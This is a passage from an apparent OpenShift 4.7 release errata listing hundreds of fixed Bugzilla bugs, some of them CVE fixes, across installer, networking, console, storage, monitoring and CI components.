209 didn't update the sample archive, but machineset and pdbs are now namespaced 1888227 - Failed to deploy some of container image on the recent OCP 4.6 nightly build 1888292 - Fix CVE-2015-7501 affecting agent-maven-3.5 1888311 - p&f: make SAR traffic from oauth and openshift apiserver exempt 1888363 - namespaces crash in dev 1888378 - [IPI on Azure] errors destroying cluster when Azure resource group was never created 1888381 - instance:node_network_receive_bytes_excluding_lo:rate1m value twice expected 1888464 - installer missing permission definitions for TagResources and UntagResources when installing in existing VPC 1888494 - imagepruner pod is error when image registry storage is not configured 1888565 - [OSP] machine-config-daemon-firstboot.service failed with "error reading osImageURL from rpm-ostree" 1888595 - cluster-policy-controller logs shows error which reads initial monitor sync has error 1888601 - The poddisruptionbudgets is using the operator service account, instead of gather 1888657 - oc doesn't know its name 1888663 - sdn starts after kube-apiserver, delay readyz until oauth-apiserver is reachable 1888671 - Document the Cloud Provider's ignore-volume-az setting 1888738 - quay.io/openshift/origin-must-gather:latest is not a multi-arch, manifest-list image 1888763 - at least one of these parameters (Vendor, DeviceID or PfNames) has to be defined in nicSelector in CR %s", cr.GetName() 1888827 - ovnkube-master may segfault when trying to add IPs to a nil address set 1888861 - need to pass dual-stack service CIDRs to kube-apiserver in dual-stack cluster 1888866 - AggregatedAPIDown permanently firing after removing APIService 1888870 - JS error when using autocomplete in YAML editor 1888874 - hover message are not shown for some properties 1888900 - align plugins versions 1888985 - Cypress: Fix 'Ensures buttons have discernible text' accesibility violation 1889213 - The error message of uploading failure is not clear enough 1889267 - Increase the time out for creating template and upload image in the terraform 1889348 - Project link should be removed from Application Details page, since it is inaccurate (Application Stages) 1889374 - Kiali feature won't work on fresh 4.6 cluster 1889388 - ListBundles returns incorrect replaces/skips when bundles have been added via semver-skippatch mode 1889420 - OCP failed to add vsphere disk when pod moved to new node during cluster upgrade 1889515 - Accessibility - The symbols e.g checkmark in the Node > overview page has no text description, label, or other accessible information 1889529 - [Init-CR annotation] Inline alert shows operand instance was needed still appearing after creating an Operand instance 1889540 - [4.5 upgrade][alert]CloudCredentialOperatorDown 1889577 - Resources are not shown on project workloads page 1889620 - [Azure] - Machineset not scaling when publicIP:true in disconnected Azure enviroment 1889630 - Scheduling disabled popovers are missing for Node status in Node Overview and Details pages 1889692 - Selected Capacity is showing wrong size 1889694 - usbguard fails to install as RHCOS extension due to missing libprotobuf.so.15 1889698 - When the user clicked cancel at the Create Storage Class confirmation dialog all the data from the Local volume set goes off 1889710 - Prometheus metrics on disk take more space compared to OCP 4.5 1889721 - opm index add semver-skippatch mode does not respect prerelease versions 1889724 - When LocalVolumeDiscovery CR is created form the LSO page User doesn't see the Disk tab 1889767 - [vsphere] Remove certificate from upi-installer image 1889779 - error when destroying a vSphere installation that failed early 1889787 - OCP is flooding the oVirt engine with auth errors 1889838 - race in Operator update after fix from bz1888073 1889852 - support new AWS regions ap-east-1, af-south-1, eu-south-1 1889863 - Router prints incorrect log message for namespace label selector 1889891 - Backport timecache LRU fix 1889912 - Drains can cause high CPU usage 1889921 - Reported Degraded=False Available=False pair does not make sense 1889928 - [e2e][automation] Add more tests for golden os 1889943 - EgressNetworkPolicy does not work when setting Allow rule to a dnsName 1890038 - Infrastructure status.platform not migrated to status.platformStatus causes warnings 1890074 - MCO extension kernel-headers is invalid 1890104 - with Serverless 1.10 version of trigger/subscription/channel/IMC is V1 as latest 1890130 - multitenant mode consistently fails CI 1890141 - move off docker.io images for build/image-eco/templates/jenkins e2e 1890145 - The mismatched of font size for Status Ready and Health Check secondary text 1890180 - FieldDependency x-descriptor doesn't support non-sibling fields 1890182 - DaemonSet with existing owner garbage collected 1890228 - AWS: destroy stuck on route53 hosted zone not found 1890235 - e2e: update Protractor's checkErrors logging 1890250 - workers may fail to join the cluster during an update from 4.5 1890256 - Replacing a master node on a baremetal IPI deployment gets stuck when deleting the machine of the unhealthy member 1890270 - External IP doesn't work if the IP address is not assigned to a node 1890361 - s390x: Generate new ostree rpm with fix for rootfs immutability 1890456 - [vsphere] mapi_instance_create_failed doesn't work on vsphere 1890467 - unable to edit an application without a service 1890472 - [Kuryr] Bulk port creation exception not completely formatted 1890494 - Error assigning Egress IP on GCP 1890530 - cluster-policy-controller doesn't gracefully terminate 1890630 - [Kuryr] Available port count not correctly calculated for alerts 1890671 - [SA] verify-image-signature using service account does not work 1890677 - 'oc image info' claims 'does not exist' for application/vnd.oci.image.manifest.v1+json manifest 1890808 - New etcd alerts need to be added to the monitoring stack 1890951 - Mirror of multiarch images together with cluster logging case problems. It doesn't sync the "overall" sha it syncs only the sub arch sha. 1890984 - Rename operator-webhook-config to sriov-operator-webhook-config 1890995 - wew-app should provide more insight into why image deployment failed 1891023 - ovn-kubernetes rbac proxy never starts waiting for an incorrect API call 1891047 - Helm chart fails to install using developer console because of TLS certificate error 1891068 - [sig-instrumentation] Prometheus when installed on the cluster shouldn't report any alerts in firing state apart from Watchdog and AlertmanagerReceiversNotConfigured [Early] failing due to TargetDown alert from kube-scheduler 1891080 - [LSO] When Localvolumeset and SC is already created before OCS install Creation of LVD and LVS is skipped when user click created storage cluster from UI 1891108 - p&f: Increase the concurrency share of workload-low priority level 1891143 - CVO deadlocked while shutting down, shortly after fresh cluster install (metrics goroutine) 1891189 - [LSO] max device limit is accepting negative values. PVC is not getting created and no error is shown 1891314 - Display incompatible helm charts for installation (kubeVersion of cluster doesn't meet requirements of chart) 1891362 - Wrong metrics count for openshift_build_result_total 1891368 - fync should be fsync for etcdHighFsyncDurations alert's annotations.message 1891374 - fync should be fsync for etcdHighFsyncDurations critical alert's annotations.message 1891376 - Extra text in Cluster Utilization charts 1891419 - Wrong detail head on network policy detail page. 1891459 - Snapshot tests should report stderr of failed commands 1891498 - Other machine config pools do not show during update 1891543 - OpenShift 4.6/OSP install fails when node flavor has less than 25GB, even with dedicated storage 1891551 - Clusterautoscaler doesn't scale up as expected 1891552 - Handle missing labels as empty. 1891555 - The windows oc.exe binary does not have version metadata 1891559 - kuryr-cni cannot start new thread 1891614 - [mlx] testpmd fails inside OpenShift pod using DevX version 19.11 1891625 - [Release 4.7] Mutable LoadBalancer Scope 1891702 - installer get pending when additionalTrustBundle is added into install-config.yaml 1891716 - OVN cluster upgrade from 4.6.1 to 4.7 fails 1891740 - OperatorStatusChanged is noisy 1891758 - the authentication operator may spam DeploymentUpdated event endlessly 1891759 - Dockerfile builds cannot change /etc/pki/ca-trust 1891816 - [UPI] [OSP] control-plane.yml provisioning playbook fails on OSP 16.1 1891825 - Error message not very informative in case of mode mismatch 1891898 - The ClusterServiceVersion can define Webhooks that cannot be created. 1891951 - UI should show warning while creating pools with compression on 1891952 - [Release 4.7] Apps Domain Enhancement 1891993 - 4.5 to 4.6 upgrade doesn't remove deployments created by marketplace 1891995 - OperatorHub displaying old content 1891999 - Storage efficiency card showing wrong compression ratio 1892004 - OCP 4.6 opm on Ubuntu 18.04.4 - error /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.28' not found (required by ./opm) 1892167 - [SR-IOV] SriovNetworkNodePolicies apply ignoring the spec.nodeSelector. 1892198 - TypeError in 'Performance Profile' tab displayed for 'Performance Addon Operator' 1892288 - assisted install workflow creates excessive control-plane disruption 1892338 - HAProxyReloadFail alert only briefly fires in the event of a broken HAProxy config 1892358 - [e2e][automation] update feature gate for kubevirt-gating job 1892376 - Deleted netnamespace could not be re-created 1892390 - TestOverwrite/OverwriteBundle/DefaultBehavior in operator-registry is flaky 1892393 - TestListPackages is flaky 1892448 - MCDPivotError alert/metric missing 1892457 - NTO-shipped stalld needs to use FIFO for boosting. 1892467 - linuxptp-daemon crash 1892521 - [AWS] Startup bootstrap machine failed due to ignition file is missing in disconnected UPI env 1892653 - User is unable to create KafkaSource with v1beta 1892724 - VFS added to the list of devices of the nodeptpdevice CRD 1892799 - Mounting additionalTrustBundle in the operator 1893117 - Maintenance mode on vSphere blocks installation. 1893351 - TLS secrets are not able to edit on console. 1893362 - The ovs-xxxxx_openshift-sdn container does not terminate gracefully, slowing down reboots 1893386 - false-positive ReadyIngressNodes_NoReadyIngressNodes: Auth operator makes risky "worker" assumption when guessing about ingress availability 1893546 - Deploy using virtual media fails on node cleaning step 1893601 - overview filesystem utilization of OCP is showing the wrong values 1893645 - oc describe route SIGSEGV 1893648 - Ironic image building process is not compatible with UEFI secure boot 1893724 - OperatorHub generates incorrect RBAC 1893739 - Force deletion doesn't work for snapshots if snapshotclass is already deleted 1893776 - No useful metrics for image pull time available, making debugging issues there impossible 1893798 - Lots of error messages starting with "get namespace to enqueue Alertmanager instances failed" in the logs of prometheus-operator 1893832 - ErrorCount field is missing in baremetalhosts.metal3.io CRD 1893889 - disabled dropdown items in the pf dropdown component are skipped over and unannounced by JAWS 1893926 - Some "Dynamic PV (block volmode)" pattern storage e2e tests are wrongly skipped 1893944 - Wrong product name for Multicloud Object Gateway 1893953 - (release-4.7) Gather default StatefulSet configs 1893956 - Installation always fails at "failed to initialize the cluster: Cluster operator image-registry is still updating" 1893963 - [Testday] Workloads-> Virtualization is not loading for Firefox browser 1893972 - Should skip e2e test cases as early as possible 1894013 - [v2v][Testday] VMware to CNV VM import]VMware URL: It is not clear that only the FQDN/IP address is required without 'https://' 1894020 - User with edit users cannot deploy images from their own namespace from the developer perspective 1894025 - OCP 4.5 to 4.6 upgrade for "aws-ebs-csi-driver-operator" fails when "defaultNodeSelector" is set 1894041 - [v2v][[Testday]VM import from VMware/RHV] VM import wizard: The target storage class name is not displayed if default storage class is used. 1894065 - tag new packages to enable TLS support 1894110 - Console shows wrong value for maxUnavailable and maxSurge when set to 0 1894144 - CI runs of baremetal IPI are failing due to newer libvirt libraries 1894146 - ironic-api used by metal3 is over provisioned and consumes a lot of RAM 1894194 - KuryrPorts leftovers from 4.6 GA need to be deleted 1894210 - Failed to encrypt OSDs on OCS4.6 installation (via UI) 1894216 - Improve OpenShift Web Console availability 1894275 - Fix CRO owners file to reflect node owner 1894278 - "database is locked" error when adding bundle to index image 1894330 - upgrade channels needs to be updated for 4.7 1894342 - oauth-apiserver logs many "[SHOULD NOT HAPPEN] failed to update managedFields for ... OAuthClient ... no corresponding type for oauth.openshift.io/v1, Kind=OAuthClient" 1894374 - Dont prevent the user from uploading a file with incorrect extension 1894432 - [oVirt] sometimes installer timeout on tmp_import_vm 1894477 - bash syntax error in nodeip-configuration.service 1894503 - add automated test for Polarion CNV-5045 1894519 - [OSP] External mode cluster creation disabled for Openstack and oVirt platform 1894539 - [on-prem] Unable to deploy additional machinesets on separate subnets 1894645 - Cinder volume provisioning crashes on nil cloud provider 1894677 - image-pruner job is panicking: klog stack 1894810 - Remove TechPreview Badge from Eventing in Serverless version 1.11.0 1894860 - 'backend' CI job passing despite failing tests 1894910 - Update the node to use the real-time kernel fails 1894992 - All nightly jobs for e2e-metal-ipi failing due to ipa image missing tenacity package 1895065 - Schema / Samples / Snippets Tabs are all selected at the same time 1895099 - vsphere-upi and vsphere-upi-serial jobs time out waiting for bootstrap to complete in CI 1895141 - panic in service-ca injector 1895147 - Remove memory limits on openshift-dns 1895169 - VM Template does not properly manage Mount Windows guest tools check box during VM creation 1895268 - The bundleAPIs should NOT be empty 1895309 - [OCP v47] The RHEL node scaleup fails due to "No package matching 'cri-o-1.19.*' found available" on OCP 4.7 cluster 1895329 - The infra index filled with warnings "WARNING: kubernetes.io/cinder built-in volume provider is now deprecated. The Cinder volume provider is deprecated and will be removed in a future release" 1895360 - Machine Config Daemon removes a file although its defined in the dropin 1895367 - Missing image in metadata DB index.db in disconnected Operator Hub installation. OCP 4.6.1 1895372 - Web console going blank after selecting any operator to install from OperatorHub 1895385 - Revert KUBELET_LOG_LEVEL back to level 3 1895423 - unable to edit an application with a custom builder image 1895430 - unable to edit custom template application 1895509 - Backup taken on one master cannot be restored on other masters 1895537 - [sig-imageregistry][Feature:ImageExtract] Image extract should extract content from an image 1895838 - oc explain description contains '/' 1895908 - "virtio" option is not available when modifying a CD-ROM to disk type 1895909 - e2e-metal-ipi-ovn-dualstack is failing 1895919 - NTO fails to load kernel modules 1895959 - configuring webhook token authentication should prevent cluster upgrades 1895979 - Unable to get coreos-installer with --copy-network to work 1896101 - [cnv][automation] Added negative tests for migration from VMWare and RHV 1896160 - CI: Some cluster operators are not ready: marketplace (missing: Degraded) 1896188 - [sig-cli] oc debug deployment configs from a build: local-busybox-1-build not completed 1896218 - Occasional GCP install failures: Error setting IAM policy for project ...: googleapi: Error 400: Service account ... does not exist., badRequest 1896229 - Current Rate of Bytes Received and Current Rate of Bytes Transmitted data can not be loaded 1896244 - Found a panic in storage e2e test 1896296 - Git links should avoid .git as part of the URL and should not link git:// urls in general 1896302 - [e2e][automation] Fix 4.6 test failures 1896365 - [Migration]The SDN migration cannot revert under some conditions 1896384 - [ovirt IPI]: local coredns resolution not working 1896446 - Git clone from private repository fails after upgrade OCP 4.5 to 4.6 1896529 - Incorrect instructions in the Serverless operator and application quick starts 1896645 - documentationBaseURL needs to be updated for 4.7 1896697 - [Descheduler] policy.yaml param in cluster configmap is empty 1896704 - Machine API components should honour cluster wide proxy settings 1896732 - "Attach to Virtual Machine OS" button should not be visible on old clusters 1896866 - File /etc/NetworkManager/system-connections/default_connection.nmconnection is incompatible with SR-IOV operator 1896898 - ovs-configuration.service fails when multiple IPv6 default routes are provided via RAs over the same interface and deployment bootstrap fails 1896918 - start creating new-style Secrets for AWS 1896923 - DNS pod /metrics exposed on anonymous http port 1896977 - route SimpleAllocationPlugin: host name validation errors: spec.host: Invalid value: ... must be no more than 63 characters 1897003 - VNC console cannot be connected after visit it in new window 1897008 - Cypress: reenable check for 'aria-hidden-focus' rule & checkA11y test for modals 1897026 - [Migration] With updating optional network operator configuration, migration stucks on MCO 1897039 - router pod keeps printing log: template "msg"="router reloaded" "output"="[WARNING] 316/065823 (15) : parsing [/var/lib/haproxy/conf/haproxy.config:52]: option 'http-use-htx' is deprecated and ignored 1897050 - [IBM Power] LocalVolumeSet provisions boot partition as PV. 1897073 - [OCP 4.5] wrong netid assigned to Openshift projects/namespaces 1897138 - oVirt provider uses depricated cluster-api project 1897142 - When scaling replicas to zero, Octavia loadbalancer pool members are not updated accordingly 1897252 - Firing alerts are not showing up in console UI after cluster is up for some time 1897354 - Operator installation showing success, but Provided APIs are missing 1897361 - The MCO GCP-OP tests fail consistently on containerruntime tests with "connection refused" 1897412 - [sriov]disableDrain did not be updated in CRD of manifest 1897423 - Max unavailable and Max surge value are not shown on Deployment Config Details page 1897516 - Baremetal IPI deployment with IPv6 control plane fails when the nodes obtain both SLAAC and DHCPv6 addresses as they set their hostname to 'localhost' 1897520 - After restarting nodes the image-registry co is in degraded true state. 1897584 - Add casc plugins 1897603 - Cinder volume attachment detection failure in Kubelet 1897604 - Machine API deployment fails: Kube-Controller-Manager can't reach API: "Unauthorized" 1897635 - CVE-2020-28362 golang: math/big: panic during recursive division of very large numbers 1897641 - Baremetal IPI with IPv6 control plane: nodes respond with duplicate packets to ICMP6 echo requests 1897676 - [CI] [Azure] [UPI] CI failing since 4.6 changes in ignition 1897830 - [GSS] Unable to deploy OCS 4.5.2 on OCP 4.6.1, cannot `Create OCS Cluster Service` 1897891 - [RFE][v2v][UI][CNV VM import] Providing error message or/and block migration when vddk-init-image is missing 1897897 - ptp lose sync openshift 4.6 1898036 - no network after reboot (IPI) 1898045 - AWS EBS CSI Driver can not get updated cloud credential secret automatically 1898097 - mDNS floods the baremetal network 1898118 - Lack of logs on some image stream tests make hard to find root cause of a problem 1898134 - Descheduler logs show absolute values instead of percentage when LowNodeUtilization strategy is applied 1898159 - kcm operator shall pass --allocate-node-cidrs=false to kcm for ovn-kube and openshift-sdn cluster 1898174 - [OVN] EgressIP does not guard against node IP assignment 1898194 - GCP: can't install on custom machine types 1898238 - Installer validations allow same floating IP for API and Ingress 1898268 - [OVN]: `make check` broken on 4.6 1898289 - E2E test: Use KUBEADM_PASSWORD_FILE by default 1898320 - Incorrect Apostrophe Translation of "it's" in Scheduling Disabled Popover 1898357 - Within the operatorhub details view, long unbroken text strings do not wrap cause breaking display. 1898407 - [Deployment timing regression] Deployment takes longer with 4.7 1898417 - GCP: the dns targets in Google Cloud DNS is not updated after recreating loadbalancer service 1898487 - [oVirt] Node is not removed when VM has been removed from oVirt engine 1898500 - Failure to upgrade operator when a Service is included in a Bundle 1898517 - Ironic auto-discovery may result in rogue nodes registered in ironic 1898532 - Display names defined in specDescriptors not respected 1898580 - When adding more than one node selector to the sriovnetworknodepolicy, the cni and the device plugin pods are constantly rebooted 1898613 - Whereabouts should exclude IPv6 ranges 1898655 - [oVirt] Node deleted in oVirt should cause the Machine to go into a Failed phase 1898679 - Operand creation form - Required "type: object" properties (Accordion component) are missing red asterisk 1898680 - CVE-2020-7774 nodejs-y18n: prototype pollution vulnerability 1898745 - installation failing with CVO reporting openshift-samples not rolled out, samples not setting versions in its ClusterOperator 1898839 - Wrong YAML in operator metadata 1898851 - Multiple Pods access the same volume on the same node e2e test cases are missed from aws ebs csi driver e2e test job 1898873 - Remove TechPreview Badge from Monitoring 1898954 - Backup script does not take /etc/kubernetes/static-pod-resources on a reliable way 1899111 - [RFE] Update jenkins-maven-agen to maven36 1899128 - VMI details screen -> show the warning that it is preferable to have a VM only if the VM actually does not exist 1899175 - bump the RHCOS boot images for 4.7 1899198 - Use new packages for ipa ramdisks 1899200 - In Installed Operators page I cannot search for an Operator by it's name 1899220 - Support AWS IMDSv2 1899350 - configure-ovs.sh doesn't configure bonding options 1899433 - When Creating OCS from ocs wizard Step Discover Disks shows Error "An error occurred Not Found" 1899459 - Failed to start monitoring pods once the operator removed from override list of CVO 1899515 - Passthrough credentials are not immediately re-distributed on update 1899575 - update discovery burst to reflect lots of CRDs on openshift clusters 1899582 - update discovery burst to reflect lots of CRDs on openshift clusters 1899588 - Operator objects are re-created after all other associated resources have been deleted 1899600 - Increased etcd fsync latency as of OCP 4.6 1899603 - workers-rhel7 CI jobs failing: Failed to remove rollback: error running rpm-ostree cleanup 1899627 - Project dashboard Active status using small icon 1899725 - Pods table does not wrap well with quick start sidebar open 1899746 - [ovn] error while waiting on flows for pod: OVS sandbox port is no longer active (probably due to a subsequent CNI ADD) 1899760 - etcd_request_duration_seconds_bucket metric has excessive cardinality 1899835 - catalog-operator repeatedly crashes with "runtime error: index out of range [0] with length 0" 1899839 - thanosRuler.resources.requests does not take effect in user-workload-monitoring-config confimap 1899853 - additionalSecurityGroupIDs not working for master nodes 1899922 - NP changes sometimes influence new pods. 1899949 - [Platform] Remove restriction on disk type selection for LocalVolumeSet 1900008 - Fix internationalized sentence fragments in ImageSearch.tsx 1900010 - Fix internationalized sentence fragments in BuildImageSelector.tsx 1900020 - Remove &apos; from internationalized keys 1900022 - Search Page - Top labels field is not applied to selected Pipeline resources 1900030 - disruption_tests: [sig-imageregistry] Image registry remain available failing consistently 1900126 - Creating a VM results in suggestion to create a default storage class when one already exists 1900138 - [OCP on RHV] Remove insecure mode from the installer 1900196 - stalld is not restarted after crash 1900239 - Skip "subPath should be able to unmount" NFS test 1900322 - metal3 pod's toleration for key: node-role.kubernetes.io/master currently matches on exact value matches but should match on Exists 1900377 - [e2e][automation] create new css selector for active users 1900496 - (release-4.7) Collect spec config for clusteroperator resources 1900672 - (s390x) Upgrade from old LUKS to new not working with DASD disks 1900699 - Impossible to add new Node on OCP 4.6 using large ECKD disks - fdasd issue 1900759 - include qemu-guest-agent by default 1900790 - Track all resource counts via telemetry 1900835 - Multus errors when cachefile is not found 1900935 - `oc adm release mirror` panic panic: runtime error 1900989 - accessing the route cannot wake up the idled resources 1901040 - When scaling down the status of the node is stuck on deleting 1901057 - authentication operator health check failed when installing a cluster behind proxy 1901107 - pod donut shows incorrect information 1901111 - Installer dependencies are broken 1901200 - linuxptp-daemon crash when enable debug log level 1901301 - CBO should handle platform=BM without provisioning CR 1901355 - [Azure][4.7] Invalid vm size from customized compute nodes does not fail properly 1901363 - High Podready Latency due to timed out waiting for annotations 1901373 - redundant bracket on snapshot restore button 1901376 - [on-prem] Upgrade from 4.6 to 4.7 failed with "timed out waiting for the condition during waitForControllerConfigToBeCompleted: controllerconfig is not completed: ControllerConfig has not completed: completed(false) running(false) failing(true" 1901395 - "Edit virtual machine template" action link should be removed 1901472 - [OSP] Bootstrap and master nodes use different keepalived unicast setting 1901517 - RHCOS 4.6.1 uses a single NetworkManager connection for multiple NICs when using default DHCP 1901531 - Console returns a blank page while trying to create an operator Custom CR with Invalid Schema 1901594 - Kubernetes resource CRUD operations.Kubernetes resource CRUD operations Pod "before all" hook for "creates the resource instance" 1901604 - CNO blocks editing Kuryr options 1901675 - [sig-network] multicast when using one of the plugins 'redhat/openshift-ovs-multitenant, redhat/openshift-ovs-networkpolicy' should allow multicast traffic in namespaces where it is enabled 1901909 - The device plugin pods / cni pod are restarted every 5 minutes 1901982 - [sig-builds][Feature:Builds] build can reference a cluster service with a build being created from new-build should be able to run a build that references a cluster service 1902019 - when podTopologySpreadConstraint strategy is enabled for descheduler it throws error 1902059 - Wire a real signer for service accout issuer 1902091 - `cluster-image-registry-operator` pod leaves connections open when fails connecting S3 storage 1902111 - CVE-2020-27813 golang-github-gorilla-websocket: integer overflow leads to denial of service 1902157 - The DaemonSet machine-api-termination-handler couldn't allocate Pod 1902253 - MHC status doesnt set RemediationsAllowed = 0 1902299 - Failed to mirror operator catalog - error: destination registry required 1902545 - Cinder csi driver node pod should add nodeSelector for Linux 1902546 - Cinder csi driver node pod doesn't run on master node 1902547 - Cinder csi driver controller pod doesn't run on master node 1902552 - Cinder csi driver does not use the downstream images 1902595 - Project workloads list view doesn't show alert icon and hover message 1902600 - Container csi-snapshotter in Cinder csi driver needs to use ImagePullPolicy=IfNotPresent 1902601 - Cinder csi driver pods run as BestEffort qosClass 1902653 - [BM][IPI] Master deployment failed: No valid host was found. Reason: No conductor service registered which supports driver redfish for conductor group 1902702 - [sig-auth][Feature:LDAP][Serial] ldap group sync can sync groups from ldap: oc cp over non-existing directory/file fails 1902746 - [BM][IP] Master deployment failed - Base.1.0.GeneralError: database is locked 1902824 - failed to generate semver informed package manifest: unable to determine default channel 1902894 - hybrid-overlay-node crashing trying to get node object during initialization 1902969 - Cannot load vmi detail page 1902981 - It should default to current namespace when create vm from template 1902996 - [AWS] UPI on USGov, bootstrap machine can not fetch ignition file via s3:// URI 1903033 - duplicated lines of imageContentSources is seen when mirror release image to local registry 1903034 - OLM continuously printing debug logs 1903062 - [Cinder csi driver] Deployment mounted volume have no write access 1903078 - Deleting VolumeSnapshotClass makes VolumeSnapshot not Ready 1903107 - Enable vsphere-problem-detector e2e tests 1903164 - OpenShift YAML editor jumps to top every few seconds 1903165 - Improve Canary Status Condition handling for e2e tests 1903172 - Column Management: Fix sticky footer on scroll 1903186 - [Descheduler] cluster logs should report some info when PodTopologySpreadConstraints strategy is enabled 1903188 - [Descheduler] cluster log reports failed to validate server configuration" err="unsupported log format: 1903192 - Role name missing on create role binding form 1903196 - Popover positioning is misaligned for Overview Dashboard status items 1903206 - Ingress controller incorrectly routes traffic to non-ready pods/backends. 1903226 - MutatingWebhookConfiguration pod-identity-webhook does not exclude critical control-plane components 1903248 - Backport Upstream Static Pod UID patch 1903277 - Deprovisioning Not Deleting Security Groups [VpcLimitExceeded on e2e-aws tests] 1903290 - Kubelet repeatedly log the same log line from exited containers 1903346 - PV backed by FC lun is not being unmounted properly and this leads to IO errors / xfs corruption. 1903382 - Panic when task-graph is canceled with a TaskNode with no tasks 1903400 - Migrate a VM which is not running goes to pending state 1903402 - Nic/Disk on VMI overview should link to VMI's nic/disk page 1903414 - NodePort is not working when configuring an egress IP address 1903424 - mapi_machine_phase_transition_seconds_sum doesn't work 1903464 - "Evaluating rule failed" for "record: cluster:kube_persistentvolumeclaim_resource_requests_storage_bytes:provisioner:sum" and "record: cluster:kubelet_volume_stats_used_bytes:provisioner:sum" 1903639 - Hostsubnet gatherer produces wrong output 1903651 - Network Policies are not working as expected with OVN-Kubernetes when traffic hairpins back to the same source through a service 1903660 - Cannot install with Assisted Installer on top of IPv6 since network provider is not started 1903674 - [sig-apps] ReplicationController should serve a basic image on each replica with a private image 1903717 - Handle different Pod selectors for metal3 Deployment 1903733 - Scale up followed by scale down can delete all running workers 1903917 - Failed to load "Developer Catalog" page 1903999 - Httplog response code is always zero 1904026 - The quota controllers should resync on new resources and make progress 1904064 - Automated cleaning is disabled by default 1904124 - DHCP to static lease script doesn't work correctly if starting with infinite leases 1904125 - Boostrap VM .ign image gets added into 'default' pool instead of <cluster-name>-<id>-bootstrap 1904131 - kuryr tempest plugin test test_ipblock_network_policy_sg_rules fails 1904133 - KubeletConfig flooded with failure conditions 1904161 - AlertmanagerReceiversNotConfigured fires unconditionally on alertmanager restart 1904243 - RHCOS 4.6.1 missing ISCSI initiatorname.iscsi ! 1904244 - MissingKey errors for two plugins using i18next.t 1904262 - clusterresourceoverride-operator has version: 1.0.0 every build 1904296 - VPA-operator has version: 1.0.0 every build 1904297 - The index image generated by "opm index prune" leaves unrelated images 1904305 - Should have scroll-down bar for the field which the values list has too many results under dashboards 1904385 - [oVirt] registry cannot mount volume on 4.6.4 -> 4.6.6 upgrade 1904497 - vsphere-problem-detector: Run on vSphere cloud only 1904501 - [Descheduler] descheduler does not evict any pod when PodTopologySpreadConstraint strategy is set 1904502 - vsphere-problem-detector: allow longer timeouts for some operations 1904503 - vsphere-problem-detector: emit alerts 1904538 - [sig-arch][Early] Managed cluster should start all core operators: monitoring: container has runAsNonRoot and image has non-numeric user (nobody) 1904578 - metric scraping for vsphere problem detector is not configured 1904582 - All application traffic broken due to unexpected load balancer change on 4.6.4 -> 4.6.6 upgrade 1904663 - IPI pointer customization MachineConfig always generated 1904679 - [Feature:ImageInfo] Image info should display information about images 1904683 - `[sig-builds][Feature:Builds] s2i build with a root user image` tests use docker.io image 1904684 - [sig-cli] oc debug ensure it works with image streams 1904713 - Helm charts with kubeVersion restriction are filtered incorrectly 1904776 - Snapshot modal alert is not pluralized 1904824 - Set vSphere hostname from guestinfo before NM starts 1904941 - Insights status is always showing a loading icon 1904973 - KeyError: 'nodeName' on NP deletion 1904985 - Prometheus and thanos sidecar targets are down 1904993 - Many ampersand special characters are found in strings 1905066 - QE - Monitoring test cases - smoke test suite automation 1905074 - QE -Gherkin linter to maintain standards 1905100 - Too many haproxy processes in default-router pod causing high load average 1905104 - Snapshot modal disk items missing keys 1905115 - CI: dev-scripts fail on 02_configure_host: Failed to start network ostestbm 1905119 - Race in AWS EBS determining whether custom CA bundle is used 1905128 - [e2e][automation] e2e tests succeed without actually execute 1905133 - operator conditions special-resource-operator 1905141 - vsphere-problem-detector: report metrics through telemetry 1905146 - Backend Tests: TestHelmRepoGetter_SkipDisabled failures 1905194 - Detecting broken connections to the Kube API takes up to 15 minutes 1905221 - CVO transitions from "Initializing" to "Updating" despite not attempting many manifests 1905232 - [sig-imageregistry][Feature:ImageAppend] Image append should create images by appending them failing due to inconsistent images between CI and OCP 1905253 - Inaccurate text at bottom of Events page 1905298 - openshift-apiserver initContainer fix-audit-permissions is not requesting required resources: cpu, memory 1905299 - OLM fails to update operator 1905307 - Provisioning CR is missing from must-gather 1905319 - cluster-samples-operator containers are not requesting required memory resource 1905320 - csi-snapshot-webhook is not requesting required memory resource 1905323 - dns-operator is not requesting required memory resource 1905324 - ingress-operator is not requesting required memory resource 1905327 - openshift-kube-scheduler initContainer wait-for-host-port is not requesting required resources: cpu, memory 1905328 - Changing the bound token service account issuer invalids previously issued bound tokens 1905329 - openshift-oauth-apiserver initContainer fix-audit-permissions is not requesting required resources: cpu, memory 1905330 - openshift-monitoring init-textfile is not requesting required resources: cpu, memory 1905338 - QE -Cypress Automation for Add Flow - Database, Yaml, OperatorBacked, PageDetails 1905347 - QE - Design Gherkin Scenarios 1905348 - QE - Design Gherkin Scenarios 1905362 - [sriov] Error message 'Fail to update DaemonSet' always shown in sriov operator pod 1905368 - [sriov] net-attach-def generated from sriovnetwork cannot be restored once it was deleted 1905370 - A-Z/Z-A sorting dropdown on Developer Catalog page is not aligned with filter text input 1905380 - Default to Red Hat/KubeVirt provider if common template does not have provider annotation 1905393 - CMO uses rbac.authorization.k8s.io/v1beta1 instead of rbac.authorization.k8s.io/v1 1905404 - The example of "Remove the entrypoint on the mysql:latest image" for `oc image append` does not work 1905416 - Hyperlink not working from Operator Description 1905430 - usbguard extension fails to install because of missing correct protobuf dependency version 1905492 - The stalld service has a higher scheduler priority than ksoftirq and rcu{b, c} threads 1905502 - Test flake - unable to get https transport for ephemeral-registry 1905542 - [GSS] The "External" mode option is not available when the OCP cluster is deployed using Redhat Cluster Assisted Installer 4.6. 1905599 - Errant change to lastupdatetime in copied CSV status can trigger runaway csv syncs 1905610 - Fix typo in export script 1905621 - Protractor login test fails against a 4.7 (nightly) Power cluster 1905640 - Subscription manual approval test is flaky 1905647 - Report physical core valid-for-subscription min/max/cumulative use to telemetry 1905696 - ClusterMoreUpdatesModal component did not get internationalized 1905748 - with sharded ingresscontrollers, all shards reload when any endpoint changes 1905761 - NetworkPolicy with Egress policyType is resulting in SDN errors and improper communication within Project 1905778 - inconsistent ingresscontroller between fresh installed cluster and upgraded cluster 1905792 - [OVN]Cannot create egressfirewalll with dnsName 1905889 - Should create SA for each namespace that the operator scoped 1905920 - Quickstart exit and restart 1905941 - Page goes to error after create catalogsource 1905977 - QE ghaekin design scenaio-pipeline metrics ODC-3711 1906032 - Canary Controller: Canary daemonset rolls out slowly in large clusters 1906100 - Disconnected cluster upgrades are failing from the cli, when signature retrieval is being blackholed instead of quickly rejected 1906105 - CBO annotates an existing Metal3 deployment resource to indicate that it is managing it 1906118 - OCS feature detection constantly polls storageclusters and storageclasses 1906120 - 'Create Role Binding' form not setting user or group value when created from a user or group 